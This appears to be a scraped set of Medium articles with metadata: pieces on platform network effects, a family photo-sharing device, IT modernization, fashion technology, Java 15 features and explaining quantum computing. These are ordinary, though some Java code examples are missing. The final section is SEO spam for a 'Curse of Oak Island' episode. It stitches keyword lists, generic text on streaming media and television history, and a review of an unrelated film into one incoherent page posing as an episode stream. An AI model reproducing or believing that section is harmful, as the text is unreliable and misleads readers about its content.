The defensibility of a marketplace is a function of how differentiated its supply is. Marketplaces with commoditized or interchangeable supply (like Uber) are less defensible, see higher multi-tenanting, and face more competition. Unfortunately, this framework is not directly applicable here either because all platforms have varying degrees of differentiated supply. Users look for apps that meet specific and varied needs, and they cannot automatically be substituted for one another. However, platforms are still vulnerable to competition and multi-tenanting, i.e. developers can use more than one platform. The scale of this risk depends on the importance of the platform to a developer’s business.
Take Slack for example. Slack’s app directory includes a range of apps that customers can use to improve their experience. However, the vast majority of popular apps are not actually “native”, i.e. built on top of Slack from scratch. Rather, they are “connections” or “integrations” to pre-existing apps.
The motivation for these developers is to make it easier for customers to use their apps in any context, i.e. improving their UX. For example, Asana is one of the most popular Slack integrations and allows users to convert Slack messages into tasks on Asana or link Asana projects to specific Slack channels. This makes it much more convenient for both Asana and Slack customers. However, this also means that developers are motivated to integrate their apps with any product that their customers use frequently. In addition, the platform is not a necessity for their app to exist and it is relatively simple to extend “connections” to other platforms. This leads to extensive multi-tenanting. For example, Asana is also available on Microsoft Teams, Hangouts Chat, Glip, and Flock. And, of course, connectors like Zapier enable integration with even more collaboration tools.
In addition, “long tail” developers are less important since integrations are meant to complement the use case of the underlying product (and not create new use cases). As a result, competing platforms only need to have integrations with the most popular apps to create a “good enough” alternative. This isn’t to say that these integrations don’t create some switching costs — customers would need to set up all of their integrations again if they switch platforms. However, the wide availability of popular integrations reduces barriers to switching and weakens defensibility. Both Slack and Zoom rely on “connections” or “integrations” rather than native apps. Luckily, Slack has other forms of network effects that insulate it against competition. Unfortunately, Zoom does not.
In contrast, Salesforce is an example of a platform that skews towards native apps over integrations. Salesforce acts as a single source of truth recording data about customer interactions and business operations. Developers leverage its capabilities and recorded data to build new, native apps that extend the functionality of the platform.
The motivation for developers here is to target new market opportunities and acquire new customers. Take Vlocity for example — it built a billion-dollar business by creating customized, industry-specific solutions on top of Salesforce. This extended the use cases of Salesforce’s platform to areas as diverse as claims management in insurance and subscriber management in media streaming. Crucially, it was exclusively built on Salesforce. Vlocity would need to rebuild their application from scratch if they wanted to reach customers using another CRM. This acts as a barrier to multi-tenanting and limits competition.
Clearly, “long tail” developers are exceptionally important here because the whole point of these developer programs is to create functionality that the platform cannot build itself. As a result, competitors need to match the scale of the incumbent platform to provide a comparable experience. This makes network effects exceptionally strong, with first movers locking out later competition. For example, iOS and Android were first to create network effects between developers and smartphone users, which doomed late movers like Windows Phone. While there is extensive multi-tenanting between iOS and Android, this is because they were both essentially first movers targeting different market segments — Android’s modular approach allowed it to penetrate markets that iOS simply could not reach.
The Platform Matrix: Extreme Outcomes
As we have done previously, we can now plot defensibility and scalability against each other to create a framework for evaluating platform network effects. This shows a remarkable pattern that is effectively an inverse of the catch-22 we saw with data network effects. The majority of platforms are either both scalable and defensible, or neither.
The cause of this pattern is simple. Multi-purpose platforms create more opportunities for developers to discover new use cases, which leads to a larger market for native apps. This also creates exceptionally strong and defensible network effects as the value of the platform continues to grow with user and developer adoption. This is not only true for iOS, Android, and Salesforce, but also for Shopify, WeChat’s Mini Programs, and even Atlassian.
On the other hand, the limited capabilities of focused platforms restrict new market opportunities and constrain native app development. These platforms have significantly weaker network effects but do create some switching costs. On the flip side, they are much easier to build because the use cases and complements already exist. Roku, Zendesk, Okta, and RingCentral fall into this category, in addition to Slack and Zoom.
Building a platform is rarely a near-term option for early-stage startups because attracting third-party developers requires some level of scale. However, by the time that scale is achieved, it is too late to choose the type of platform you want to build. At that point, the capabilities of the underlying product are already defined. If building a platform is the eventual goal, its desired capabilities need to be the core philosophy guiding your long-term product roadmap right from the start. | https://breadcrumb.vc/the-platform-matrix-all-platforms-are-not-created-equal-f8c8b5100858 | ['Sameer Singh'] | 2021-03-01 10:01:47.508000+00:00 | ['Venture Capital', 'Platform', 'Technology', 'Startup', 'Business'] |
Sunday, where family stories make the difference

Sunday is a family story. Four years ago, my siblings and I found ourselves in different corners of the world — my sister in China, my brother in London and I was in New York. Our grandmother was in a nursing home with little way to communicate with the family. She did not use social media like us grandchildren, so we developed a solution that bridged the generation gap. Sunday is a smart object that plugs into the TV and broadcasts photos and videos shared by friends and family via the web or mobile application. This quickly became her favorite TV channel.
The usual platforms used for sharing content, such as Facebook or Flickr, are designed for people who are tech-savvy, leaving the rest of the world on the sidelines. Sunday is a simple way to maintain healthy relationships, and a simple solution for healthcare professionals too. Nursing homes, hospitals and clinics use Sunday to share content with their patients and residents. Families are also able to send photos and videos to their loved ones while under the care of health professionals. | https://medium.com/@nellymeunier/sunday-where-family-stories-make-the-difference-d6cf7fa3da53 | ['Nelly Meunier'] | 2019-06-09 14:38:13.587000+00:00 | ['Startup Life', 'Healthcare', 'Technology', 'Startup', 'Storytelling'] |
Modernization Mistakes and How to Avoid Them

When it’s time for your business to go through the modernization process, there are some common mistakes that you need to avoid. These mistakes will not only cause setbacks, but will also make your systems more fragile. In turn, the mistakes tally up extra expenses to fix the problems, and can result in lost revenue and potentially lost customers.
One of the biggest mistakes in modernization is not giving the process proper attention and focus. Perhaps the person or people you’ve hired to do the job don’t finish it, or they modernize one system at a time, piecemeal, maybe even as a side project. Spreading resources thin and modernizing one system at a time will result in your business being in a constant state of modernization, because by the time you finish with the last system, the first system that was modernized is no longer current and needs to be modernized again. The result is a never-ending cycle of constantly upgrading systems, which ends up being costly and adds fragility. Ensuring that modernization occurs across all systems simultaneously, or within a dedicated amount of time, and that the job is completed, is a big factor in the success of the modernization process.
Another mistake is approaching modernization with a lack of expertise around the new and old systems. A non-expert might try to adjust the code base in one place, but lack understanding and actually end up making the system more fragile in another. It’s common for coding languages to be updated and for certain functions to be deprecated for security reasons, which in turn means the code base needs to be updated to keep working. But if the person doing the modernization doesn’t know or understand why the changes are necessary, then anything they do to adjust the code could make the system more fragile. They could even reopen the same security issues by using the same methods while sidestepping the security fix with different functions, which is worse because now you are vulnerable and don’t know it.
***Click here for full text*** | https://medium.com/@pwvconsultants/modernization-mistakes-and-how-to-avoid-them-f5448d5881d8 | ['Pwv Consultants'] | 2020-10-13 22:36:51.206000+00:00 | ['Security', 'Modernization', 'Information Technology', 'Information Security', 'Fragility'] |
Technology is eating fashion

This op-ed was originally published in Business of Fashion (https://www.businessoffashion.com/articles/opinion/op-ed-technology-is-eating-fashion) on 31 August 2017.
Fashion companies that don’t embrace technology are sitting ducks just waiting to be picked off by sharp-shooting software companies.
If you think you run a fashion business, you’re wrong. A technology business with a fashion focus? Sure. Anything else and you may as well wave the white flag because the rules of the rag trade are changing. You’re either leading that change, or you’re a sitting duck ready to be picked off by a sharp-shooting tech juggernaut.
Since Amazon first started peddling books online, Jeff Bezos never once saw his company as a retailer. “Amazon is a technology company. We just happen to do retail,” said Amazon CTO Werner Vogels in 2011. With this mentality, it’s no surprise Amazon has been able to conquer retail category after retail category, solving age-old supply-chain inefficiencies using technology as the not-so-secret weapon.
From product development to distribution, nothing about the fashion supply-chain is agile. It’s impossible for traditional fashion businesses to respond to real-time demand; it takes too long to get ideas to market. Even Zara, the masters of supply-chain efficiency, can only bring a product to market in 10–15 days. In our hyper-connected digital world, a lot can change in 15 minutes let alone 15 days.
The supply-chain also fails with personalisation. Products must be designed to appeal to markets broad enough to justify producing at scale, sacrificing individualisation for unit economics. Then there’s the fit issue. Standard sizes statistically fit less than 20 per cent of the total addressable population. Too many consumers fall between the cracks of standard sizing bell-curves.
These shortcomings are being aggressively addressed by tech companies. Amazon for one has been mining its retail data and spinning up private labels to exploit product gaps discovered in the apparel market. In April 2017 the company was granted a patent for an on-demand apparel manufacturing system that creates custom clothing to the fit and specifications of individual customers. This means Amazon can not only eliminate inventory, but can respond almost instantly to market trends, and sell their products to the entire population.
Los Angeles-based Fame and Partners is another pioneer in the on-demand apparel supply chain. Like Amazon, the online womenswear label has developed a proprietary factory floor system with their manufacturing partner near Shanghai. CEO Nyree Corby says Fame and Partners use a modular design approach, allowing them to create new styles tied to their pattern and factory floor systems, which in turn maximises design flexibility, fit, and manufacturability. Corby says the rise of direct to consumer labels “translates to a larger proportion of brands now taking inventory risk than their business models previously allowed for.” She adds that reduced barriers for new fashion labels going to market “is driving fragmentation of trends and contributing to the general retail malaise.”
As consumers and their expectations digitally evolve, so too must the companies that clothe them. It’s not viable for fashion companies to design products for market segments when tech companies can design products for specific individuals. It’s not viable for fashion companies to spend weeks or months bringing products to market if tech-companies can do the same in seconds.
Technologies like data mining, machine learning, pattern bootstrapping, and product virtualisation are the tools of the new game. Tools that are already bolstering the arsenal of tech retailers like San Francisco-based Stitch Fix. They use artificial intelligence to analyse and predict purchasing behaviour and formulate new product designs based on what components of style are popular at the time. Their AI-design technology sorts through trillions of design and fabric variants to generate products that have a statistically-high chance of retail success.
Human designers cannot compete with AI-designers when it comes to synthesising complex data from multiple sources. They also can’t compete with AI-designers to action their findings and assemble, render, and launch entirely new products in seconds. A consumer may soon be browsing an eCommerce site as an AI-designer watches and learns from their actions. The machine could design, render, and display new products to the consumer in real-time based on what it believes they want. The product could then be manufactured only after the consumer has purchased the product, eliminating inventory risk.
This supply chain revolution doesn’t only apply to mass-market fashion brands. Luxury brands cannot claim superiority when tech-driven mass-market players can guarantee a more personalised and better-fitting product.
Technology also shifts the creative process towards a more symmetric interaction between consumers and brands. With AI, brands have the scalability to use individual customers as the basis of inspiration for designs. H&M’s Ivyrevel has collaborated with Google to translate “a week of your life into a one-of-a-kind design.” Lifestyle data is collected through an Ivyrevel app, including tracking venues they visit and activities they do. The app learns “who you are, what you like to do, and where you like to go,” and then proposes a unique dress design for a specific occasion.
This might sound like a novelty, however, it’s just the beginning of a movement where technology begins to inform the creative process. To remain at the cutting-edge, luxury brands must learn to harness AI to pioneer new and meaningful experiences with consumers.
Fashion businesses need to start their transition into technology companies now. The sooner they start, the sooner they’ll cultivate the domain expertise required to remain competitive in the future. Firstly, digitise historical designs and build a rich database of products split into their individual variants. When properly organised, a human or AI designer can easily reference this library to assemble a unique product without having to create anything from scratch.
Secondly, ditch standard-size grading and adopt parametric pattern grading. With parametric grading any product design can be made to fit any body type. It is getting easier and easier to capture customer body data, from taking 3D body scans on smartphones to predicting 50+ measurements from a few questions about fit. It’s only a matter of time before the mass market falls for a bespoke fit, and you don’t want to be dependent on standard sizes when that time comes.
With parametric grading and bespoke fit comes the third recommendation: supplement your mass-produced inventory with on-demand production. You can quash sizing-related problems, eliminate unsold inventory headaches, and be responsive to consumer demand on a sale-by-sale basis. A low-barrier-of-entry approach would be to leverage pre-sales as a way to collect a critical mass of orders before producing custom products at scale.
Finally, start collecting and analysing all the data that you have, such as point-of-sale data, e-commerce analytics and metrics about your customers. Whatever you have, collect it. Your biggest competitive advantage is locked away in the data that flows through your business, day in day out. Build infrastructure around your data to analyse and take action on the findings. Your business’ survival depends on it. | https://medium.com/bespokify/technology-is-eating-fashion-7341fcbea74d | ['Marc C. Close'] | 2019-11-15 06:06:04.055000+00:00 | ['Fashion', 'Fashion Technology', 'Apparel', 'Technology', 'Startup'] |
What’s new in Java 15

JDK 15 is the open-source reference implementation of version 15 of the Java SE Platform, as specified by JSR 390 in the Java Community Process.
JDK 15 reached General Availability on 15 September 2020. Production-ready binaries under the GPL are available from Oracle; binaries from other vendors will follow shortly.
The features and schedule of this release were proposed and tracked via the JEP Process, as amended by the JEP 2.0 proposal. The release was produced using the JDK Release Process (JEP 3).
Removals
Solaris and SPARC Ports
The source code and build support for the Solaris/SPARC, Solaris/x64, and Linux/SPARC ports were removed. These ports were deprecated for removal in JDK 14 with the express intent to remove them in a future release.
Nashorn Javascript Engine
The Nashorn JavaScript script engine and APIs, and the jjs tool were removed. The engine, the APIs, and the tool were deprecated for removal in Java 11 with the express intent to remove them in a future release.
Deprecations
RMI Activation
RMI Activation mechanism is deprecated. RMI Activation is an obsolete part of RMI that has been optional since Java 8. No other part of RMI will be deprecated.
What's new
Helpful NullPointerExceptions
Usability of NullPointerException has been improved. Messages generated by the JVM now describe precisely which variable was null .
Before Java 15
In Java 15
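For example, given code like the sketch below (names here are illustrative, not from the original screenshots), a JDK 15 JVM reports exactly which reference on the failing line was null. The exact message wording varies with compiler debug flags, so it is shown as an approximate comment only.

```java
public class NpeDemo {
    public static class Person {
        String name; // intentionally left null
    }

    public static int nameLength(Person p) {
        // Two candidate nulls on this line: p itself, or p.name.
        // JDK 15's helpful message says which one it actually was.
        return p.name.length();
    }

    public static void main(String[] args) {
        try {
            nameLength(new Person());
        } catch (NullPointerException e) {
            // e.g.: Cannot invoke "String.length()" because "<local1>.name" is null
            System.out.println(e.getMessage());
        }
    }
}
```

Before JDK 15 the same failure produced a bare `NullPointerException` with no message, leaving you to guess which of the two references was null.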
Text Blocks
A text block is a multi-line string literal that avoids the need for most escape sequences, automatically formats the string in a predictable way, and gives the developer control over the format when desired.
Before Java 15
In Java 15
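The original before/after screenshots can be condensed into one sketch: both methods below return the same string, but the text block (final in JDK 15 via JEP 378) keeps the layout readable and drops the escape sequences.

```java
public class TextBlockDemo {
    // Before Java 15: escaped, concatenated string literals
    public static String oldHtml() {
        return "<html>\n" +
               "    <body>Hello</body>\n" +
               "</html>\n";
    }

    // Java 15: a text block; incidental indentation is stripped
    // based on the position of the closing delimiter
    public static String html() {
        return """
                <html>
                    <body>Hello</body>
                </html>
                """;
    }

    public static void main(String[] args) {
        System.out.println(oldHtml().equals(html())); // true
    }
}
```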
JVM Improvements
ZGC Garbage Collector
The Z Garbage Collector (ZGC) is a scalable low latency garbage collector. ZGC performs all expensive work concurrently, without stopping the execution of application threads for more than 10ms, which makes it suitable for applications that require low latency and/or use a very large heap (multi-terabytes).
At a glance, ZGC is:
Concurrent
Region-based
Compacting
NUMA-aware
Using colored pointers
Using load barriers
At its core, ZGC is a concurrent garbage collector, meaning all heavy lifting work is done while Java threads continue to execute. This greatly limits the impact garbage collection will have on your application’s response time.
Beginning with Java 15, it is a production-ready GC.
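Unlike the default collector, ZGC must be enabled explicitly. A typical invocation looks like the following; the heap size and jar name are placeholders, not values from the article:

```shell
# Enable ZGC; production-ready from JDK 15 onward (JEP 377),
# so -XX:+UnlockExperimentalVMOptions is no longer required.
java -XX:+UseZGC -Xmx16g -jar app.jar
```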
Hidden Classes
Classes that cannot be used directly by the bytecode of other classes. Hidden classes are intended for use by frameworks that generate classes at run time and use them indirectly, via reflection. A hidden class may be defined as a member of an access control nest and may be unloaded independently of other classes.
EdDSA
EdDSA is a modern elliptic curve signature scheme that has several advantages over the existing signature schemes in the JDK.
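A short sketch of signing and verifying with the new scheme. "Ed25519" is one of the standard algorithm names introduced with this feature (JEP 339); everything else here is ordinary JCA usage.

```java
import java.security.GeneralSecurityException;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;

public class EdDsaDemo {
    // Signs msg with a fresh Ed25519 key pair, then verifies the signature.
    public static boolean signAndVerify(byte[] msg) {
        try {
            KeyPair kp = KeyPairGenerator.getInstance("Ed25519").generateKeyPair();

            Signature signer = Signature.getInstance("Ed25519");
            signer.initSign(kp.getPrivate());
            signer.update(msg);
            byte[] sigBytes = signer.sign();

            Signature verifier = Signature.getInstance("Ed25519");
            verifier.initVerify(kp.getPublic());
            verifier.update(msg);
            return verifier.verify(sigBytes);
        } catch (GeneralSecurityException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(signAndVerify("hello".getBytes())); // true on JDK 15+
    }
}
```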
DatagramSocket API
The underlying implementations of the java.net.DatagramSocket and java.net.MulticastSocket APIs were replaced with simpler and more modern implementations that are easy to maintain and debug. The new implementations are easy to adapt to work with virtual threads, currently being explored in Project Loom.
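Because only the implementation changed, existing code keeps working unmodified. A minimal loopback round trip using the same public API (the message and buffer size are arbitrary):

```java
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;

public class UdpDemo {
    // Sends msg to a local server socket and returns what the server received.
    public static String echoOnce(String msg) {
        InetAddress lo = InetAddress.getLoopbackAddress();
        try (DatagramSocket server = new DatagramSocket(0, lo);
             DatagramSocket client = new DatagramSocket(0, lo)) {
            server.setSoTimeout(2000); // don't hang if the packet is lost
            byte[] out = msg.getBytes();
            client.send(new DatagramPacket(out, out.length, lo, server.getLocalPort()));
            byte[] buf = new byte[1024];
            DatagramPacket in = new DatagramPacket(buf, buf.length);
            server.receive(in);
            return new String(in.getData(), 0, in.getLength());
        } catch (Exception e) {
            return "error: " + e;
        }
    }

    public static void main(String[] args) {
        System.out.println(echoOnce("ping"));
    }
}
```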
Preview Features
A preview feature is a new feature whose design, specification, and implementation are complete, but which is not permanent, which means that the feature may exist in a different form or not at all in future JDK releases.
Pattern Matching
Pattern matching involves testing whether an object has a particular structure, then extracting data from that object if there’s a match. You can already do this with Java; however, pattern matching introduces new language enhancements that enable you to conditionally extract data from objects with code that’s more concise and robust.
More specifically, JDK 15 extends the instanceof operator: you can specify a binding variable; if the result of the instanceof operator is true , then the object being tested is assigned to the binding variable.
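A sketch of the extended instanceof operator. In JDK 15 this was a preview feature requiring --enable-preview; it is shown here in the form that was later finalized (JDK 16).

```java
public class PatternDemo {
    public static String describe(Object o) {
        // s is the binding variable: assigned only when the test succeeds,
        // and in scope wherever the compiler can prove the test was true.
        if (o instanceof String s) {
            return "String of length " + s.length();
        } else if (o instanceof Integer i && i > 0) {
            return "positive int " + i;
        }
        return "something else";
    }

    public static void main(String[] args) {
        System.out.println(describe("hi")); // String of length 2
        System.out.println(describe(42));   // positive int 42
    }
}
```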
Records
Introduced as a preview feature in Java SE 14, record classes help to model plain data aggregates with less ceremony than normal classes. Java SE 15 extends the preview feature with additional capabilities such as local record classes.
A record class declares a sequence of fields, and then the appropriate accessors, constructors, equals , hashCode , and toString methods are created automatically. The fields are final because the class is intended to serve as a simple "data carrier". This means that records are immutable.
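A sketch of a record in use (preview in JDK 15, finalized in JDK 16). One line of declaration replaces the usual constructor, accessors, equals , hashCode , and toString boilerplate.

```java
public class RecordDemo {
    // The record header declares the fields; everything else is generated.
    public record Point(int x, int y) {}

    public static void main(String[] args) {
        Point p = new Point(3, 4);
        System.out.println(p.x());                     // 3  (generated accessor)
        System.out.println(p.equals(new Point(3, 4))); // true (value-based equals)
        System.out.println(p);                         // Point[x=3, y=4]
    }
}
```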
Sealed Classes
Sealed classes and interfaces restrict which other classes or interfaces may extend or implement them.
One of the primary purposes of inheritance is code reuse: When you want to create a new class and there is already a class that includes some of the code that you want, you can derive your new class from the existing class. In doing this, you can reuse the fields and methods of the existing class without having to write (and debug) them yourself.
Before Sealed Classes
With Sealed Classes
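The before/after screenshots can be condensed into one sketch. Sealed types were a preview feature in JDK 15 and were finalized in JDK 17; the example below uses the finalized syntax, and the Shape hierarchy is an illustration, not code from the article. Because the compiler knows Shape permits exactly two implementations, exhaustive handling becomes checkable.

```java
public class SealedDemo {
    // Only Circle and Square may implement Shape; any other attempt
    // is a compile-time error.
    public sealed interface Shape permits Circle, Square {}
    public record Circle(double radius) implements Shape {}
    public record Square(double side) implements Shape {}

    public static double area(Shape s) {
        if (s instanceof Circle c) return Math.PI * c.radius() * c.radius();
        if (s instanceof Square sq) return sq.side() * sq.side();
        throw new IllegalStateException("unreachable: Shape permits only Circle and Square");
    }

    public static void main(String[] args) {
        System.out.println(area(new Square(3))); // 9.0
    }
}
```

Before sealed classes, the only options were leaving the interface open to arbitrary implementors or resorting to package-private constructors and documentation conventions.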
Conclusion
In this article, we have checked what was added and removed in Java 15. And how all the changes that were delivered with a Java 15 can improve your existing projects. | https://medium.com/javarevisited/whats-new-in-java-15-70335926cc42 | ['Dmytro Timchenko'] | 2020-11-21 06:19:25.188000+00:00 | ['Technology', 'Software Engineering', 'Programming', 'Software Development', 'Java'] |
What Could Make Quantum Computing Easy to Explain?

In a recent Quanta article, What Makes Quantum Computing So Hard to Explain?, Scott Aaronson cautions,
“To understand what quantum computers can do — and what they can’t — avoid falling for overly simple explanations.”
That’s great advice, but it is also kind of vacuous since you could say the same thing about digital computers, or a toaster for that matter. The problem with the explanations of quantum computing as they exist today is not that they are overly simple — it is that they are overly detailed. Google “how does a quantum computer work,” and you are met right out of the gate with qubits and parallel universes, spooky action at a distance, exponential growth, and — wow — no wonder people are confused.
The entire premise of the statement above is that someone wants to know what quantum computers can do — for them. Yet, quantum computer scientists feel compelled to talk about superposition and entanglement. While it is fine to talk about superposition and entanglement — I’ve stopped people on the street to talk about quantum physics — that’s not what people need to hear about quantum computing through casual Google searches. Aaronson himself makes an attempt in the article to explain quantum computing that avoids his own criticism:
“So a qubit is a bit that has a complex number called an amplitude attached to the possibility that it’s 0, and a different amplitude attached to the possibility that it’s 1.”
This is absolutely 100% correct, but I’m going to wager that this means nothing to someone who didn’t already know that. What is going on here? Why do we try so hard to explain every detail of quantum physics as if it is the only path to understanding quantum computation? The answer partially lies in the illusion of explanatory depth. We have this illusion that we understand things we know how to use. But we don’t. Think about it. Do you know how a computer works? A toaster? A doorknob? If you think you do, try to explain it. Try to explain how you would build it. Use pictures if you like, but I think you will quickly change your mind about how much you thought you understood about even simple technology.
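For readers who want Aaronson's sentence in symbols, it is simply the standard way of writing a qubit's state: one complex amplitude per classical outcome.

```latex
% A qubit: complex amplitudes alpha (for 0) and beta (for 1)
|\psi\rangle = \alpha\,|0\rangle + \beta\,|1\rangle,
\qquad \alpha, \beta \in \mathbb{C},
\qquad |\alpha|^{2} + |\beta|^{2} = 1
```

Measuring the qubit yields 0 with probability $|\alpha|^{2}$ and 1 with probability $|\beta|^{2}$, which is why the amplitudes must satisfy the normalization condition above.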
We don’t use quantum computers, so we don’t have the illusion we understand how they work. This has two side effects. The first is that we (the quantum scientists) think conventional computing is generally well-understood or needs no explanation. The second is that we (the quantum scientists again) accept the idea that quantum computing is hard to explain. In turn, this causes us to try way too hard at explaining it, hoping the listener will feel as comfortable with quantum computing as they do with their smartphones.
To see why the “try too hard” approach is a problem, consider an analogy. Imagine our curious friend wants to know what a digital computer can do. Apparently, what the quantum computer scientist would do is start talking about bits of information, logical operators, stored-program architectures, and so on, expecting that the listener would easily connect these concepts together and deduce that the UberEats app is possible. But this is, of course, silly. Instead, what you would want to do is say, “Have you ever ordered food using your smartphone? OK. Let’s explore how your intention to get a nice kale salad gets interpreted by the computer on your phone…”
An even better analogy is the other hot deep-tech topic of artificial intelligence. Search for “what is AI,” and most legitimate explainers will state a generically vague answer and then spend most of the words detailing the existing and future applications. The vague answer given is usually something along the following lines — an AI is an autonomous machine that can learn from known examples and makes generalizations that work for unfamiliar examples. Then, the article will go on to say that AI is used in your digital assistant, to recognize faces in photos, to detect spam, and so on. The reader comes away happy that they know — insomuch as anyone with eight minutes of reading can know — what AI can do.
(By the way, if all someone came here for is an eight-minute read about quantum computers, try this instead.)
I suppose, at this point, the current reader is wondering what the current writer’s grand plan is for solving the world’s current quantum education and literacy problems. I’m glad you asked, as it is an innovation that I and colleagues worldwide are in the midst of creating. For me, it all starts with a change in perspective. When I look into the not-too-distant future, I see quantum software developers who have never heard of the words “superposition” and “entanglement” (much like someone writing code today for the next food delivery app doesn’t use the words “transistor” or “NAND gate”). So with that future quantum software developer in mind, I ask myself what their quantum education looks like and, more importantly, how do we get there from here? (No, not wormholes or flux capacitors.)
I would be remiss to exclude the pun of quantum baby steps. But there are also leaps. Quantum Computing for Babies and Quantum Leaps were an attempt to bring quantum computing to ever-younger audiences.
Others have brought new innovations for introducing quantum computing to general adult audiences. For example, Andy Matuschak and Michael Nielsen have created Quantum Country, which is best described as an introductory textbook with interspersed questions that will automatically be reasked based on how often you answer them correctly (spaced repetition for the cognitive science aficionados).
The first set of quiz cards in Quantum Country.
Brilliant — an app that teaches topics through active problem solving — has a Quantum Computing course. Note that it requires a premium membership to fully enjoy.
BLACK OPAL is an app from Q-CTRL, currently in private beta, that includes highly interactive exercises for learning quantum computing.
In-app with BLACK OPAL courtesy of Q-CTRL.
Quantum Atlas is a multimedia encyclopedia hosted at the Joint Quantum Institute, which is maintained by a large National Science Foundation-funded group of scientists and science journalists.
Seemingly orthogonal to all of that is quantum games, many of which are designed for the purpose of teaching quantum computing. The best-produced example is the somewhat unimaginatively named Quantum Game.
Demo screen from Quantum Game.
Speaking of games, I recently wrote about how I’ve changed the way I teach quantum computing to undergraduate students through game development.
I would have agreed with almost everything Aaronson said several years ago. (In fact, he and others have been saying the same thing for ten years.) But I’m kind of bored of that narrative. In fact, I would argue that quantum computing is not hard to explain. All we need is a different perspective. | https://medium.com/@csferrie/what-could-make-quantum-computing-easy-to-explain-647599468c4c | ['Chris Ferrie'] | 2021-08-06 05:44:40.074000+00:00 | ['Computer Science', 'Education', 'Quantum Computing', 'Technology', 'Quantum'] |
165 | The Curse of Oak Island < (Season 8 :: Episode 6) > “Full/Episode” | The Curse of Oak Island Streaming Francais P E L I C U L A : Originally, A mystery story that focuses on homicides. Usually, the detective must figure out who killed one or several victims. They could or may not find themselves or loved ones in peril as a result of this investigation. The genre often includes factors of the suspense story genre, or of the action and adventure genres.
The Curse of Oak Island
The Curse of Oak Island 8x6
The Curse of Oak Island S8E6
The Curse of Oak Island Cast
The Curse of Oak Island x The Curse of Oak Island
The Curse of Oak Island History
The Curse of Oak Island Eps. 6
The Curse of Oak Island Season 8
The Curse of Oak Island Episode 6
The Curse of Oak Island Premiere
The Curse of Oak Island New Season
The Curse of Oak Island Full Episodes
The Curse of Oak Island Watch Online
The Curse of Oak Island Season 8 Episode 6
Watch The Curse of Oak Island Season 8 Episode 6 Online
✨The discovery of an expanding stone roadway under the muck of the swamp sends the team out to sea to investigate exactly how far it reaches.
✌ STREAMING MEDIA ✌
Streaming media is multimedia that is constantly received by and presented to an end-user while being delivered by a provider. The verb to stream refers to the process of delivering or obtaining media in this manner. Streaming refers to the delivery method of the medium, rather than the medium itself. Distinguishing delivery method from the media distributed applies especially to telecommunications networks, as almost all of the delivery systems are either inherently streaming (e.g. radio, television, streaming apps) or inherently non-streaming (e.g. books, video cassettes, audio CDs). There are challenges with streaming content on the web. For instance, users whose Internet connection lacks sufficient bandwidth may experience stops, lags, or slow buffering of the content. And users lacking compatible hardware or software systems may be unable to stream certain content.
Streaming is an alternative to file downloading, an activity in which the end-user obtains the entire file for the content before watching or listening to it. Through streaming, an end-user may use their media player to get started on playing digital video or digital sound content before the complete file has been transmitted. The term “streaming media” can connect with media other than video and audio, such as for example live closed captioning, ticker tape, and real-time text, which are considered “streaming text”.
This brings me around to discussing I Still Believe, a film release of the Christian religious faith-based variety. As is almost customary, Hollywood usually generates two (maybe three) films of this variety within its yearly theatrical release lineup, with the releases usually landing around springtime and/or fall respectively. I didn’t hear much when this movie was initially announced (it probably got buried underneath all of the popular movie news on the newsfeed). My first actual glimpse of the movie was when the film’s trailer premiered, which looked somewhat interesting to me. Yes, it looked like the movie was going to have the typical “faith-based” vibe, but it was going to be directed by the Erwin Brothers, who directed I Can Only Imagine (a film that I did like). Plus, the trailer for I Still Believe premiered for quite some time, so I continued seeing it most of the time when I visited my local cinema. You can sort of say that it was a bit “engrained in my brain”. Thus, I was a little bit keen on seeing it. Fortunately, I was able to see it before the COVID-19 outbreak closed the movie theaters down (I saw it during its opening night), but, because of work scheduling, I haven’t had the time to do my review for it…. as yet. And what did I think of it? Well, it was pretty “meh”. While its heart is certainly in the proper place and quite sincere, the film is a little too preachy and unbalanced within its narrative execution and character developments. The religious message is plainly there, but it takes way too many detours and fails to focus on certain aspects, which weighs down the feature’s presentation.
✌ TELEVISION SHOW AND HISTORY ✌
A television show (often simply TV show) is any content produced for broadcast via over-the-air, satellite, cable, or internet and typically viewed on a television set, excluding breaking news, advertisements, or trailers that are usually placed between shows. TV shows are most often scheduled well ahead of time and appear on electronic guides or other TV listings.

A television show may also be called a television program (British English: programme), especially if it lacks a narrative structure. A TV series is usually released in episodes that follow a narrative, and is usually split into seasons (US and Canada) or series (UK) — yearly or semiannual sets of new episodes. A show with a limited number of episodes may be called a miniseries, serial, or limited series. A one-time show may be called a “special”. A television film (“made-for-TV movie” or “television movie”) is a film that is initially broadcast on television rather than released in theaters or direct-to-video.

Television shows may be viewed as they are broadcast in real time (live), be recorded on home video or a digital video recorder for later viewing, or be viewed on demand via a set-top box or streamed over the internet.

The first television shows were experimental, sporadic broadcasts viewable only within an extremely short range from the broadcast tower, starting in the 1930s. Televised events such as the 1936 Summer Olympics in Germany, the 1937 coronation of King George VI in the UK, and David Sarnoff’s famous introduction at the 1939 New York World’s Fair in the US spurred a rise in the medium, but World War II put a halt to development until after the war. The 1947 World Series inspired many Americans to buy their first television set, and in 1948 the popular radio show Texaco Star Theater made the move and became the first weekly televised variety show, earning host Milton Berle the name “Mr Television” and demonstrating that the medium was a stable, modern form of entertainment which could attract advertisers. The first national live television broadcast in the US took place on September 4, 1951, when President Harry Truman’s speech at the Japanese Peace Treaty Conference in San Francisco was transmitted over AT&T’s transcontinental cable and microwave radio relay system to broadcast stations in local markets.
✌ FINAL THOUGHTS ✌
The power of faith, love, and affinity for music take center stage in Jeremy Camp’s life story in the movie I Still Believe. Directors Andrew and Jon Erwin (the Erwin Brothers) examine the life and times of Jeremy Camp, pin-pointing his early life along with his relationship with Melissa Henning as they battle hardships and their enduring love for one another through difficult times. While the movie’s intent and thematic message of a person’s faith through troubled times is indeed palpable, plus the likeable musical performances, the film certainly struggles to find a cinematic footing in its execution, including a sluggish pace, fragmented pieces, predictable plot beats, too preachy / cheesy dialogue moments, overused religious overtones, and mismanagement of many of its secondary / supporting characters. To me, this movie was somewhere between okay and “meh”. It was definitely a Christian faith-based movie endeavor (from start to finish) and definitely had its moments, nonetheless it failed to resonate with me, struggling to locate a proper balance in its undertaking. Personally, regardless of the story, it could’ve been better. My recommendation for this movie is an “iffy choice” at best, as some will like it (nothing wrong with that), while others will not and dismiss it altogether. Whatever your stance on religious faith-based flicks, it stands as more of a cautionary tale of sorts, demonstrating how a poignant and heartfelt story of real-life drama can be problematic when translated into a cinematic endeavor. 